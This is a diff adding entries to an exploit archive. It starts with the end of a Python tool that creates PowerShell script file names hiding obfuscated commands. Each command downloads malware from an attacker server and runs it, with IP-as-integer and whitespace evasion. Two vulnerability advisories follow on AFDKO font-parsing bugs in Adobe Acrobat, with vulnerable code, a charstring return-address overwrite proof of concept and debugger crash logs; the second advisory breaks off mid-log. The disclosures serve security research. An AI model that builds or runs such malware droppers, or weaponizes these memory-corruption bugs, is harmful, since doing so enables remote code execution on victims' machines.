+#-z payload requires a forced malware download on server-side, defaults port 80 and expects an ip-address.
+#
+#Added: IP to Integer for extra evasion - e.g 127.0.0.1 = 2130706433
+#
+#Added: Prefix whitespace - attempt to hide the filename payload by push it to the end of the filename.
+#
+#Since we have space limit, malware names should try be 5 chars max e.g. 'a.exe' including the ext to make room for
+#IP/Host/Port and whitespace especially when Base64 encoding, for reverse command string option we have more room to play.
+#e.g. a.exe or n.js (1 char for the name plus 2 to 3 chars for ext plus the dot).
+#
+#All in the name of the dirty PS filename.
+#=========================================
+
+BANNER='''
+   ________________                          _____ __   _____ __    __ 
+  / ____/ ____/ __ \____ _      _____  _____/ ___// /_ |__  // /   / / 
+ / / __/ / __/ /_/ / __ \ | /| / / _ \/ ___/\__ \/ __ \ /_ </ /   / /  
+/ /_/ / /_/ / ____/ /_/ / |/ |/ /  __/ /   ___/ / / / /__/ / /___/ /___
+\____/\____/_/    \____/|__/|__/\___/_/   /____/_/ /_/____/_____/_____/                                                                                                           
+                                                                                                                
+By hyp3rlinx
+ApparitionSec
+'''
+
+
+FILENAME_PREFIX="Hello-World"
+POWERSHELL_OBFUSCATED="poWeRshELl"
+DEFAULT_PORT="80"
+DEFAULT_BASE64_WSPACE_LEN=2
+MAX_CHARS = 254
+WARN_MSG="Options: register shorter domain name, try <ip-address> -i flag, force-download or omit whitespace."
+
+
+def parse_args():
+    parser.add_argument("-s", "--server", help="Server to download malware from.")
+    parser.add_argument("-p", "--port", help="Malware server port, defaults 80.")
+    parser.add_argument("-m", "--locf", help="Name for the Malware upon download.")
+    parser.add_argument("-r", "--remf", nargs="?", help="Malware to download from the remote server.")
+    parser.add_argument("-f", "--force_download", nargs="?", const="1", help="No malware name specified, malwares force downloaded from the server web-root, malware type must be known up front.")
+    parser.add_argument("-z", "--rev_str_cmd", nargs="?", const="1", help="Reverse string command obfuscation Base64 alternative, ip-address and port 80 only, Malware must be force downloaded on the server-side, see -e.")
+    parser.add_argument("-w", "--wspace",  help="Amount of whitespace to use for added obfuscation, Base64 is set for 2 bytes.")
+    parser.add_argument("-i", "--ipevade", nargs="?", const="1", help="Use the integer value of the malware servers IP address for obfuscation/evasion.")
+    parser.add_argument("-e", "--example", nargs="?", const="1", help="Show example use cases")
+    return parser.parse_args()
+
+
+#self reverse PS commands
+def rev_str_command(args):
+    malware=args.locf[::-1]
+    revload=malware
+    revload+=" trats;"
+    revload+=malware
+    revload+=" eliFtuO- "
+    revload+=args.server[::-1]
+    revload+=" rwi"
+
+    payload = "$a='"
+    payload+=malware
+    payload+=" trats;"
+    payload+=malware
+    payload+=" eliFtuO- "
+    payload+=args.server[::-1]
+    payload+=" rwi'[-1..-"+str(len(revload))
+    payload+="]-join '';iex $a"
+    return payload
+
+
+def ip2int(addr):
+    return struct.unpack("!I", inet_aton(addr))[0]
+
+
+def ip2hex(ip):
+    x = ip.split('.')
+    return '0x{:02X}{:02X}{:02X}{:02X}'.format(*map(int, x))
+
+
+def obfuscate_ip(target):
+    IPHex = ip2hex(target)
+    return str(ip2int(IPHex))
+
+
+def decodeB64(p):
+    return b64decode(p)
+
+
+def validIP(host):
+    try:
+        socket.inet_aton(host)
+        return True
+    except socket.error:
+        return False
+    
+
+def filename_sz(space,cmds,mode):
+    if mode==0:
+         return len(FILENAME_PREFIX)+len(space)+ 1 +len(POWERSHELL_OBFUSCATED)+ 4 + len(cmds)+ len(";.ps1")
+    else:
+        return len(FILENAME_PREFIX) + len(space) + 1 + len(cmds) + len(";.ps1")
+
+
+def check_filename_size(sz):
+    if sz > MAX_CHARS:
+        print "Filename is", sz, "chars of max allowed", MAX_CHARS
+        print WARN_MSG
+        return False
+    return True
+
+
+def create_file(payload, args):
+    try:
+        f=open(payload, "w")
+        f.write("Write-Output 'Have a good night!'")
+        f.close()
+    except Exception as e:
+        print "[!] File not created!"
+        print WARN_MSG
+        return False
+    return True
+
+
+def cmd_info(t,p):
+    print "PAYLOAD: "+p
+    if t==0:
+        print "TYPE: Base64 encoded payload."
+    else:
+        print "TYPE: Self Reversing String Command (must force-download the malware server side)."
+
+
+
+def main(args):
+
+    global FILENAME_PREFIX
+    
+    if len(sys.argv)==1:
+        parser.print_help(sys.stderr)
+        sys.exit(1)
+
+    if args.example:
+        usage()
+        exit()
+
+    sz=0
+    space=""
+    b64payload=""
+    reverse_string_cmd=""
+
+    if not validIP(args.server):
+        if not args.rev_str_cmd:
+            if args.server.find("http://")==-1:
+                args.server = "http://"+args.server
+
+    if args.ipevade:
+        args.server = args.server.replace("http://", "")
+        if validIP(args.server):
+            args.server = obfuscate_ip(args.server)
+        else:
+            print "[!] -i (IP evasion) requires a valid IP address, see Help -h."
+            exit()
+
+    if not args.locf:
+        print "[!] Missing local malware save name -m flag see Help -h."
+        exit()
+        
+    if not args.rev_str_cmd:
+
+        if not args.remf and not args.force_download:
+            print "[!] No remote malware specified, force downloading are we? use -f or -r flag, see Help -h."
+            exit()
+
+        if args.remf and args.force_download:
+            print "[!] Multiple download options specified, use -r or -f exclusively, see Help -h."
+            exit()
+
+        if args.force_download:
+            args.remf=""
+            
+        if args.remf:
+            #remote file can be extension-less
+            if not re.findall("^[~\w,a-zA-Z0-9]$", args.remf) and not re.findall("^[~\w,\s-]+\.[A-Za-z0-9]{2,3}$", args.remf):
+                print "[!] Invalid remote malware name specified, see Help -h."
+                exit()
+
+            #local file extension is required
+        if not re.findall("^[~\w,\s-]+\.[A-Za-z0-9]{2,3}$", args.locf):
+            print "[!] Local malware name "+args.locf+" invalid, must contain no paths and have the correct extension."
+            exit()
+            
+        if not args.port:
+            args.port = DEFAULT_PORT
+            
+        if args.wspace:
+            args.wspace = int(args.wspace)
+            space="--IAA="*DEFAULT_BASE64_WSPACE_LEN
+            if args.wspace != DEFAULT_BASE64_WSPACE_LEN:
+                 print "[!] Ignoring", args.wspace, "whitespace amount, Base64 default is two bytes"
+        
+        filename_cmd = "powershell iwr "
+        filename_cmd+=args.server
+        filename_cmd+=":"
+        filename_cmd+=args.port
+        filename_cmd+="/"
+        filename_cmd+=args.remf
+        filename_cmd+=" -OutFile "
+        filename_cmd+=args.locf
+        filename_cmd+=" ;sleep -s 2;start "
+        filename_cmd+=args.locf
+                        
+        b64payload = b64encode(filename_cmd.encode('UTF-16LE'))
+        sz = filename_sz(space, b64payload, 0)
+
+        FILENAME_PREFIX+=space
+        FILENAME_PREFIX+=";"
+        FILENAME_PREFIX+=POWERSHELL_OBFUSCATED
+        FILENAME_PREFIX+=" -e "
+        FILENAME_PREFIX+=b64payload
+        FILENAME_PREFIX+=";.ps1"
+        COMMANDS = FILENAME_PREFIX 
+        
+    else:
+
+        if args.server.find("http://")!=-1:
+            args.server = args.server.replace("http://","")
+
+        if args.force_download:
+             print "[!] Ignored -f as forced download is already required with -z flag."
+        
+        if args.wspace:
+            space=" "*int(args.wspace)
+            
+        if args.remf:
+            print "[!] Using both -z and -r flags is disallowed, see Help -h."
+            exit()
+            
+        if args.port:
+            print "[!] -z flag must use port 80 as its default, see Help -h."
+            exit()
+
+        if not re.findall("^[~\w,\s-]+\.[A-Za-z0-9]{2,3}$", args.locf):
+            print "[!] Local Malware name invalid -m flag."
+            exit()
+            
+        reverse_string_cmd = rev_str_command(args)
+        sz = filename_sz(space, reverse_string_cmd, 1)
+
+        FILENAME_PREFIX+=space
+        FILENAME_PREFIX+=";"
+        FILENAME_PREFIX+=reverse_string_cmd
+        FILENAME_PREFIX+=";.ps1"
+        COMMANDS=FILENAME_PREFIX
+
+    if check_filename_size(sz):
+        if create_file(COMMANDS,args):
+            if not args.rev_str_cmd:
+                cmd_info(0,decodeB64(b64payload))
+            else:
+                cmd_info(1,reverse_string_cmd)
+            return sz
+            
+    return False
+    
+
+def usage():
+    print "(-r) -s <domain-name.xxx> -p 5555 -m  g.js -r n.js -i -w 2"
+    print "     Whitespace, IP evasion, download, save and exec malware via Base64 encoded payload.\n"
+    print "     Download an save malware simply named '2' via port 80, rename to f.exe and execute."
+    print "     -s <domain-name.xxx> -m  a.exe -r 2\n"
+    print "(-f) -s <domain-name.xxx> -f -m  d.exe"
+    print "     Expects force download from the servers web-root, malware type must be known upfront.\n"
+    print "(-z) -s 192.168.1.10 -z -m q.cpl -w 150"
+    print "     Reverse string PowerShell command alternative to Base64 obfuscation"
+    print "     uses self reversing string of PS commands, malware type must be known upfront."
+    print "     Defaults port 80, ip-address only and requires server-side forced download from web-root.\n"
+    print "(-i) -s 192.168.1.10 -i -z -m ~.vbs -w 100"
+    print "     Reverse string command with (-i) IP as integer value for evasion.\n"      
+    print "     Base64 is the default command obfuscation encoding, unless -z flags specified."
+
+if __name__=="__main__":
+
+    print BANNER
+    parser = argparse.ArgumentParser()
+    sz = main(parse_args())
+    
+    if sz:
+        print "DIRTY FILENAME SIZE: %s" % (sz) +"\n"
+        print "PowerShell Unsantized Filename RCE file created."
+'''
+[POC Video URL]
+https://www.youtube.com/watch?v=AH33RW9g8J4
+
+
+[Network Access]
+Remote
+
+
+[Severity]
+High
+
+
+[Disclosure Timeline]
+Vendor Notification: July 20, 2019
+MSRC "does not meet the bar for security servicing" : July 23, 2019
+August 1, 2019 : Public Disclosure
+
+
+
+[+] Disclaimer
+The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
+Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
+that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
+is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
+for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
+or exploits by the author or elsewhere. All content (c).
+'''
+
+hyp3rlinx
\ No newline at end of file
diff --git a/exploits/windows/dos/47259.txt b/exploits/windows/dos/47259.txt
new file mode 100644
index 000000000..6bbef744d
--- /dev/null
+++ b/exploits/windows/dos/47259.txt
@@ -0,0 +1,205 @@
+-----=====[ Background ]=====-----
+
+AFDKO (Adobe Font Development Kit for OpenType) is a set of tools for examining, modifying and building fonts. The core part of this toolset is a font handling library written in C, which provides interfaces for reading and writing Type 1, OpenType, TrueType (to some extent) and several other font formats. While the library existed as early as 2000, it was open-sourced by Adobe in 2014 on GitHub [1, 2], and is still actively developed. The font parsing code can be generally found under afdko/c/public/lib/source/*read/*.c in the project directory tree.
+
+We have recently discovered that parts of AFDKO are compiled in in Adobe's desktop software such as Adobe Acrobat. Within a single installation of Acrobat, we have found traces of AFDKO in four different libraries: acrodistdll.dll, Acrobat.dll, CoolType.dll and AdobePDFL.dll. According to our brief analysis, AFDKO is not used for font rasterization (there is a different engine for that), but rather for the conversion between font formats. For example, it is possible to execute the AFDKO copy in CoolType.dll by opening a PDF file with an embedded font, and exporting it to a PostScript (.ps) or Encapsulated PostScript (.eps) document. It is uncertain if the AFDKO copies in other libraries are reachable as an attack surface and how.
+
+It is also interesting to note that the AFDKO copies in the above DLLs are much older than the latest version of the code on GitHub. This can be easily recognized thanks to the fact that each component of the library (e.g. the Type 1 Reader - t1r, Type 1 Writer - t1w, CFF reader - cfr etc.) has its own version number included in the source code, and they change over time. For example, CoolType's version of the "cfr" module is 2.0.44, whereas the first open-sourced commit of AFDKO from September 2014 has version 2.0.46 (currently 2.1.0), so we can conclude that the CoolType fork is at least about ~5 years old. Furthermore, the forks in Acrobat.dll and AdobePDFL.dll are even older, with a "cfr" version of 2.0.31.
+
+Despite the fact that CoolType contains an old fork of the library, it includes multiple non-public fixes for various vulnerabilities, particularly a number of important bounds checks in read*() functions declared in cffread/cffread.c (e.g. readFDSelect, readCharset etc.). These checks were first introduced in CoolType.dll shipped with Adobe Reader 9.1.2, which was released on 28 May 2009. This means that the internal fork of the code has had many bugs fixed for the last 10 years, which are still not addressed in the open-source branch of the code. Nevertheless, we found more security vulnerabilities which affect the AFDKO used by CoolType, through analysis of the publicly available code. This report describes one such issue reachable through the Adobe Acrobat file export functionality.
+
+-----=====[ Description ]=====-----
+
+The "Type 2 Charstring Format" specification from 5 May 1998 introduced two storage operators: store and load, which were both deprecated in the next iteration of the specs in 2000. These operators were responsible for copying data between the transient array (also known as the BuildCharArray, or BCA) and the so-called "Registry object".
+
+As the document stated:
+
+"""
+    The Registry provides more permanent storage for a number of items that have predefined meanings. The items stored in the Registry do not persist beyond the scope of rendering a font. Registry items are selected with an index, thus:
+
+    0 Weight Vector
+    1 Normalized Design Vector
+    2 User Design Vector
+
+    The result of selecting a Registry item with an index outside this list is undefined.
+"""
+
+The Type 1 CharString interpreter implemented in t1Decode() (c/public/lib/source/t1cstr/t1cstr.c) supports the load and store operators:
+
+--- cut ---
+  1450                      case t1_store:
+  1451                          result = do_store(h);
+  1452                          if (result)
+  1453                              return result;
+  1454                          continue;
+[...]
+  1470                      case t1_load:
+  1471                          result = do_load(h);
+  1472                          if (result)
+  1473                              return result;
+  1474                          continue;
+--- cut ---
+
+The do_store() and do_load() functions are as follows:
+
+--- cut ---
+   664  /* Select registry item. Return NULL on invalid selector. */
+   665  static float *selRegItem(t1cCtx h, int reg, int *size) {
+   666      switch (reg) {
+   667          case T1_REG_WV:
+   668              *size = T1_MAX_MASTERS;
+   669              return h->aux->WV;
+   670          case T1_REG_NDV:
+   671              *size = T1_MAX_AXES;
+   672              return h->aux->NDV;
+   673          case T1_REG_UDV:
+   674              *size = T1_MAX_AXES;
+   675              return h->aux->UDV;
+   676      }
+   677      return NULL;
+   678  }
+   679
+   680  /* Execute "store" op. Return 0 on success else error code. */
+   681  static int do_store(t1cCtx h) {
+   682      int size;
+   683      int count;
+   684      int i;
+   685      int j;
+   686      int reg;
+   687      float *array;
+   688
+   689      CHKUFLOW(4);
+   690
+   691      count = (int)POP();
+   692      i = (int)POP();
+   693      j = (int)POP();
+   694      reg = (int)POP();
+   695      array = selRegItem(h, reg, &size);
+   696
+   697      if (array == NULL ||
+   698          i < 0 || i + count + 1 >= TX_BCA_LENGTH ||
+   699          j < 0 || j + count + 1 >= size)
+   700          return t1cErrStoreBounds;
+   701
+   702      memcpy(&array[j], &h->BCA[i], sizeof(float) * count);
+   703      return 0;
+   704  }
+   705
+[...]
+   736
+   737  /* Execute "load" op. Return 0 on success else error code. */
+   738  static int do_load(t1cCtx h) {
+   739      int size;
+   740      int count;
+   741      int i;
+   742      int reg;
+   743      float *array;
+   744
+   745      CHKUFLOW(3);
+   746
+   747      count = (int)POP();
+   748      i = (int)POP();
+   749      reg = (int)POP();
+   750      array = selRegItem(h, reg, &size);
+   751
+   752      if (i < 0 || i + count - 1 >= TX_BCA_LENGTH || count > size)
+   753          return t1cErrLoadBounds;
+   754
+   755      memcpy(&h->BCA[i], array, sizeof(float) * count);
+   756
+   757      return 0;
+   758  }
+--- cut ---
+
+While both routines try to enforce proper bounds of the indexes and lengths (lines 697-700 and 752-753), they miss one important corner case -- negative count. When a value smaller than 0 is specified for "count", many of the other sanity checks can be bypassed, and out-of-bounds read/write access can be triggered with a high degree of control over what is copied where. The condition is especially dangerous in x86 builds, where a controlled 32-bit index added to a memory pointer can address the entire process address space. At the time of this writing, Adobe Acrobat for Windows is available as a 32-bit build only.
+
+To give an example, setting count to a value in the range of 0x80000000-0xbfffffff makes it possible to set the "sizeof(float) * count" expression evaluate to an arbitrary multiple of 4 (0, 4, 8, ..., 0xfffffff8), enabling us to copy any chosen number of bytes in lines 702 and 755. At the same time, the value is so small that it bypasses all checks where "i + count" and "j + count" are involved for i, j in the range of 0-0x3fffffff, which also enables us to refer to the entire address space relative to the referenced buffer.
+
+To summarize, we can copy an arbitrary number of bytes between h->BCA[] and the registry arrays at arbitrary offsets, which is a powerful primitive. There is only one obstacle -- the fact that values on the interpreter stack are stored as 32-bit floats, which means they have a 23-bit mantissa. For this reason, it is impossible to precisely control the integer values of i, j and count, if they are in the order of 2^30 or 2^31. The granularity is 128 for numbers around 2^30 and 256 for numbers around 2^31, so for example it is impossible to set i to 0x3fffffff or count to 0x80000001; the closest values are 0x3fffff80/0x40000000 and 0x80000000/0x80000100, respectively. In practice, this means that we can only copy out-of-bounds memory in chunks of 512 bytes (4 * 128) or 1024 under specific conditions, and that we can only choose negative offsets relative to BCA/array which are divisible by 128. On the other hand, if we set count to a largely negative value (e.g. -1073741696), we can set i and j to fully controlled (small) positive numbers.
+
+The h->BCA[] array is stored within the t1cCtx structure in the stack frame of the t1cParse() function. The registry arrays reside within t1cAuxData structures allocated on the heap. As a result, the vulnerability gives us out-of-bounds access to both the stack and heap. An attacker could target generic data in memory related to the control flow such as return addresses, or application-specific data inside t1cCtx/t1cAuxData, which also contain many sensitive fields such as function pointers etc.
+
+As a side note, the do_load() routine doesn't verify that array != NULL, which may result in a) operating on an uninitialized "size" variable in line 752, and b) passing NULL as the source parameter to memcpy() in line 755.
+
+-----=====[ Invalid memcpy_s usage ]=====-----
+
+We also wanted to point out another interesting bug in AFDKO, which is not present in the GitHub repository but can be found in CoolType. The latter build of the code uses safe variants of many standard functions, such as memcpy_s() instead of memcpy(), vsprintf_s() instead of vsprintf() etc. The memcpy() call in do_store() was also converted to memcpy_s(), and currently looks like this in decompiled form:
+
+--- cut ---
+  memcpy_s(&array[j], 4 - 4 * j, (char *)h + 4 * i + 916, 4 * count);
+--- cut ---
+
+which can be translated to:
+
+--- cut ---
+  memcpy_s(&array[j], sizeof(array) - sizeof(float) * j, &h->BCA[i], sizeof(float) * count);
+--- cut ---
+
+Note the second argument, which is supposed to be the length of the buffer being copied to. Judging by the code the author meant to set it to the number of available bytes from element "j" to the end of the array, but used the sizeof(array) expression instead of the actual length stored in the "size" variable. In this case sizeof(array) is the size of a pointer and evaluates to 4 or 8, which is nowhere near the actual size of the array (16 or 64 depending on the register). Consequently, this bug effectively blocks access to the element at array[1] for j={0, 1}, and is incorrectly set to a huge unsigned value for j >= 2, rendering it ineffective.
+
+Considering that the 2nd "destsz" memcpy_s argument is not supposed to be a security boundary but just a safety net, and proper sanitization of the i, j, count values should prevent any kind of out-of-bounds access, we don't consider this a separate vulnerability. We are reporting it here as FYI.
+
+-----=====[ Proof of Concept ]=====-----
+
+The proof of concept is a PDF file with an embedded Type 1 font, which includes the following payload in the CharString of the "A" character:
+
+--- cut ---
+     1  1621139584 134217728 div
+     2  dup 0 put
+     3  dup 1 put
+     4  dup 2 put
+     5  dup 3 put
+     6  dup 4 put
+     7  dup 5 put
+     8  dup 6 put
+     9  dup 7 put
+    10  dup 8 put
+    11  dup 9 put
+    12  dup 10 put
+    13  dup 11 put
+    14  0 2 0 12 store
+    15  0 67
+    16  4096 4096 -64 mul mul 128 add
+    17  load
+    18  endchar
+--- cut ---
+
+A brief description:
+
+- Line 1 constructs a float on the stack with a binary representation of 0x41414141
+- Lines 2-13 copy this value to the BuildCharArray at indexes 0-11
+- Line 14 copies the 12 values from BCA to the registry #0 starting with index #2 (due to the memcpy_s bug)
+- Lines 15-17 call the "load" operator with arguments reg=0, i=67, count=0xc0000080 (-1073741696). This results in copying 0x200 (0xc0000080 * 4) bytes from registry #0 to &h->BCA[67], which points to the return address of the t2cParse() function on the stack.
+- Line 18 uses the "endchar" operator to return from the interpreter and use the overwritten return address, crashing at address 0x41414141.
+
+-----=====[ Crash logs ]=====-----
+
+When the poc.pdf file is opened with Adobe Acrobat Pro and converted to a PostScript document via "File > Export To > (Encapsulated) PostScript", the following crash occurs in Acrobat.exe:
+
+--- cut ---
+(2b10.3acc): Access violation - code c0000005 (first chance)
+First chance exceptions are reported before any exception handling.
+This exception may be expected and handled.
+eax=00000000 ebx=00000000 ecx=0d3993bc edx=00000200 esi=0daec260 edi=0d3992b8
+eip=41414141 esp=0133a07c ebp=01000100 iopl=0         nv up ei ng nz ac pe cy
+cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00210297
+41414141 ??              ???
+0:000> dd esp
+0133a07c  41414141 41414141 41414141 41414141
+0133a08c  41414141 41414141 41414141 41414141
+0133a09c  41414141 41414141 41414141 0dfd96a0
+0133a0ac  0dfd96a0 00000004 ffffffff 00000000
+0133a0bc  00000001 66751a2a 00000000 d4385860
+0133a0cc  94000400 801f0014 21ec2020 10693aea
+0133a0dc  0008dda2 9d30302b 8071001e 00000000
+0133a0ec  00000000 acc70000 32027007 d2aa11d1
+--- cut ---
+
+-----=====[ References ]=====-----
+
+[1] https://blog.typekit.com/2014/09/19/new-from-adobe-type-open-sourced-font-development-tools/
+[2] https://github.com/adobe-type-tools/afdko
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47259.zip
\ No newline at end of file
diff --git a/exploits/windows/dos/47260.txt b/exploits/windows/dos/47260.txt
new file mode 100644
index 000000000..072a069c1
--- /dev/null
+++ b/exploits/windows/dos/47260.txt
@@ -0,0 +1,214 @@
+-----=====[ Background ]=====-----
+
+AFDKO (Adobe Font Development Kit for OpenType) is a set of tools for examining, modifying and building fonts. The core part of this toolset is a font handling library written in C, which provides interfaces for reading and writing Type 1, OpenType, TrueType (to some extent) and several other font formats. While the library existed as early as 2000, it was open-sourced by Adobe in 2014 on GitHub [1, 2], and is still actively developed. The font parsing code can be generally found under afdko/c/public/lib/source/*read/*.c in the project directory tree.
+
+We have recently discovered that parts of AFDKO are compiled in in Adobe's desktop software such as Adobe Acrobat. Within a single installation of Acrobat, we have found traces of AFDKO in four different libraries: acrodistdll.dll, Acrobat.dll, CoolType.dll and AdobePDFL.dll. According to our brief analysis, AFDKO is not used for font rasterization (there is a different engine for that), but rather for the conversion between font formats. For example, it is possible to execute the AFDKO copy in CoolType.dll by opening a PDF file with an embedded font, and exporting it to a PostScript (.ps) or Encapsulated PostScript (.eps) document. It is uncertain if the AFDKO copies in other libraries are reachable as an attack surface and how.
+
+It is also interesting to note that the AFDKO copies in the above DLLs are much older than the latest version of the code on GitHub. This can be easily recognized thanks to the fact that each component of the library (e.g. the Type 1 Reader - t1r, Type 1 Writer - t1w, CFF reader - cfr etc.) has its own version number included in the source code, and they change over time. For example, CoolType's version of the "cfr" module is 2.0.44, whereas the first open-sourced commit of AFDKO from September 2014 has version 2.0.46 (currently 2.1.0), so we can conclude that the CoolType fork is at least about ~5 years old. Furthermore, the forks in Acrobat.dll and AdobePDFL.dll are even older, with a "cfr" version of 2.0.31.
+
+Despite the fact that CoolType contains an old fork of the library, it includes multiple non-public fixes for various vulnerabilities, particularly a number of important bounds checks in read*() functions declared in cffread/cffread.c (e.g. readFDSelect, readCharset etc.). These checks were first introduced in CoolType.dll shipped with Adobe Reader 9.1.2, which was released on 28 May 2009. This means that the internal fork of the code has had many bugs fixed for the last 10 years, which are still not addressed in the open-source branch of the code. Nevertheless, we found more security vulnerabilities which affect the AFDKO used by CoolType, through analysis of the publicly available code. This report describes one such issue reachable through the Adobe Acrobat file export functionality.
+
+-----=====[ Description ]=====-----
+
+The Type 1 font parsing code in AFDKO resides in c/public/lib/source/t1read/t1read.c, and the main context structure is t1rCtx, also declared in that file. t1rCtx contains a dynamic array FDArray of FDInfo structures:
+
+--- cut ---
+    70  typedef struct /* FDArray element */
+    71  {
+    72      abfFontDict *fdict; /* Font dict */
+    73      struct              /* Subrs */
+    74      {
+    75          ctlRegion region; /* cstr data region */
+    76          dnaDCL(long, offset);
+    77      } subrs;
+    78      t1cAuxData aux; /* Auxiliary charstring data */
+    79      struct          /* Dict key info */
+    80      {
+    81          long lenIV;                /* Length random cipher bytes */
+    82          long SubrMapOffset;        /* CID-specific key */
+    83          unsigned short SubrCount;  /* CID-specific key */
+    84          unsigned short SDBytes;    /* CID-specific key */
+    85          unsigned short BlueValues; /* Flags /BlueValues seen */
+    86      } key;
+    87      t1cDecryptFunc decrypt; /* Charstring decryption function */
+    88  } FDInfo;
+    89
+[...]
+   110      dnaDCL(FDInfo, FDArray);       /* FDArray */
+--- cut ---
+
+The array is initially set to 1 element at the beginning of t1rBegFont():
+
+--- cut ---
+  3035  /* Parse PostScript font. */
+  3036  int t1rBegFont(t1rCtx h, long flags, long origin, abfTopDict **top, float *UDV) {
+[...]
+  3045      dnaSET_CNT(h->FDArray, 1);
+--- cut ---
+
+Later on, the array can be resized to any number of elements in the range of 0-256 using the /FDArray operator, which is handled by the initFDArray() function:
+
+--- cut ---
+  2041  /* Initialize FDArray. */
+  2042  static void initFDArray(t1rCtx h, long cnt) {
+  2043      int i;
+  2044      if (cnt < 0 || cnt > 256)
+  2045          badKeyValue(h, kFDArray);
+  2046      dnaSET_CNT(h->FDArray, cnt);
+  2047      dnaSET_CNT(h->fdicts, cnt);
+  2048      for (i = 0; i < h->FDArray.cnt; i++)
+  2049          initFDInfo(h, i);
+  2050      h->fd = &h->FDArray.array[0];
+  2051  }
+  2052
+[...]
+  2318          case kFDArray:
+  2319              initFDArray(h, parseInt(h, kFDArray));
+  2320              break;
+--- cut ---
+
+Parts of the FDInfo structures (specifically the "aux" nested structure) are initialized later on, in prepClientData():
+
+--- cut ---
+  2949      /* Prepare auxiliary data */
+  2950      for (i = 0; i < h->FDArray.cnt; i++) {
+  2951          FDInfo *fd = &h->FDArray.array[i];
+  2952          fd->aux.flags = 0;
+  2953          if (h->flags & T1R_UPDATE_OPS)
+  2954              fd->aux.flags |= T1C_UPDATE_OPS;
+  2955          fd->aux.src = h->stm.tmp;
+  2956          fd->aux.subrs.cnt = fd->subrs.offset.cnt;
+  2957          fd->aux.subrs.offset = fd->subrs.offset.array;
+  2958          fd->aux.subrsEnd = fd->subrs.region.end;
+  2959          fd->aux.stm = &h->cb.stm;
+[...]
+--- cut ---
+
+The problem with the code is that it assumes that FDArray always contains at least 1 element, whereas initFDArray() allows us to truncate it to 0 items. 
+
+When the client program later calls t1rIterateGlyphs(), execution will reach the following code in readGlyph():
+
+--- cut ---
+  3170  /* Read charstring. */
+  3171  static void readGlyph(t1rCtx h,
+  3172                        unsigned short tag, abfGlyphCallbacks *glyph_cb) {
+  3173      int result;
+  3174      long offset;
+  3175      long flags = h->flags;
+  3176      Char *chr = &h->chars.index.array[tag];
+  3177      t1cAuxData *aux = &h->FDArray.array[chr->iFD].aux;
+  3178
+[...]
+--- cut ---
+
+The chr->iFD values are initialized to 0 by default in abfInitGlyphInfo(), so in line 3177 the library will take a reference to the uninitialized structure under h->FDArray.array[0].aux:
+
+--- cut ---
+Breakpoint 1, readGlyph (h=0x61f000000080, tag=0, glyph_cb=0x62c0000078d8) at ../../../../../source/t1read/t1read.c:3179
+3179        if ((flags & CID_FONT) && !(flags & PRINT_STREAM)) {
+
+(gdb) print *aux
+$1 = {flags = -4702111234474983746, src = 0xbebebebebebebebe, stm = 0xbebebebebebebebe, subrs = {cnt = -4702111234474983746, offset = 0xbebebebebebebebe},
+  subrsEnd = -4702111234474983746, ctx = 0xbebebebebebebebe, getStdEncGlyphOffset = 0xbebebebebebebebe, bchar = 190 '\276', achar = 190 '\276', matrix = {
+    -0.372548997, -0.372548997, -0.372548997, -0.372548997, -0.372548997, -0.372548997}, nMasters = -16706, UDV = {-0.372548997 <repeats 15 times>}, NDV = {
+    -0.372548997 <repeats 15 times>}, WV = {-0.372548997 <repeats 64 times>}}
+--- cut ---
+
+In the above listing, 0xbe are AddressSanitizer's marker bytes for unitialized heap memory (in a Linux x64 build of the "tx" tool used for testing). The "aux" pointer is further passed down to functions in t1cstr/t1cstr.c -- first to t1cParse(), then to t1DecodeSubr(), and then to srcSeek(), where the following call is performed:
+
+--- cut ---
+   191  /* Seek to offset on source stream. */
+   192  static int srcSeek(t1cCtx h, long offset) {
+   193      if (h->aux->stm->seek(h->aux->stm, h->aux->src, offset))
+   194          return 1;
+   195      h->src.offset = offset;
+   196      return 0;
+   197  }
+--- cut ---
+
+As we remember, the contents of the "aux" object and specifically aux.stm are uninitialized, so the code attempts to load a function pointer from an undefined address. According to our tests, the memory allocator used in Adobe Acrobat boils down to a simple malloc() call without a subsequent memset(), so the undefined data could in fact be leftover bytes from an older allocation freed before the faulty font is loaded. As a result, the "stm" pointer could be controlled by the input file through some light heap spraying/grooming, such that the free memory chunks reused by malloc() contain the desired data. This, in turn, could potentially lead to arbitrary code execution in the context of the Acrobat process.
+
+-----=====[ Proof of Concept ]=====-----
+
+The proof of concept is a PDF file with an embedded Type 1 font, which includes an extra "/FDArray 0" operator to set the length of FDArray to 0, as described above.
+
+-----=====[ Crash logs ]=====-----
+
+For reliable reproduction, we have enabled the PageHeap for Acrobat.exe in Application Verifier. In addition to allocating memory on page boundaries, it also fills out newly returned memory with a 0xc0 value, resulting in more consistent crashes when using such uninitialized data.
+
+When the poc.pdf file is opened with Adobe Acrobat Pro and converted to a PostScript document via "File > Export To > (Encapsulated) PostScript", the following crash occurs in Acrobat.exe:
+
+--- cut ---
+(2728.221c): Access violation - code c0000005 (first chance)
+First chance exceptions are reported before any exception handling.
+This exception may be expected and handled.
+eax=84ca7ef4 ebx=87edee2c ecx=c0c0c0c0 edx=00000000 esi=012f9a2c edi=00000021
+eip=548d0e67 esp=012f99e0 ebp=012f99f4 iopl=0         nv up ei pl nz na po nc
+cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00210202
+CoolType!CTGetVersion+0xafccf:
+548d0e67 ff510c          call    dword ptr [ecx+0Ch]  ds:002b:c0c0c0cc=????????
+
+0:000> k
+ # ChildEBP RetAddr  
+WARNING: Stack unwind information not available. Following frames may be wrong.
+00 012f99f4 548d1091 CoolType!CTGetVersion+0xafccf
+01 012f9a1c 548d1b6e CoolType!CTGetVersion+0xafef9
+02 012f9ea0 548d545e CoolType!CTGetVersion+0xb09d6
+03 012f9ed0 548d63b1 CoolType!CTGetVersion+0xb42c6
+04 012f9eec 548a6164 CoolType!CTGetVersion+0xb5219
+05 012f9f14 548a3919 CoolType!CTGetVersion+0x84fcc
+06 012f9f34 5486bd5c CoolType!CTGetVersion+0x82781
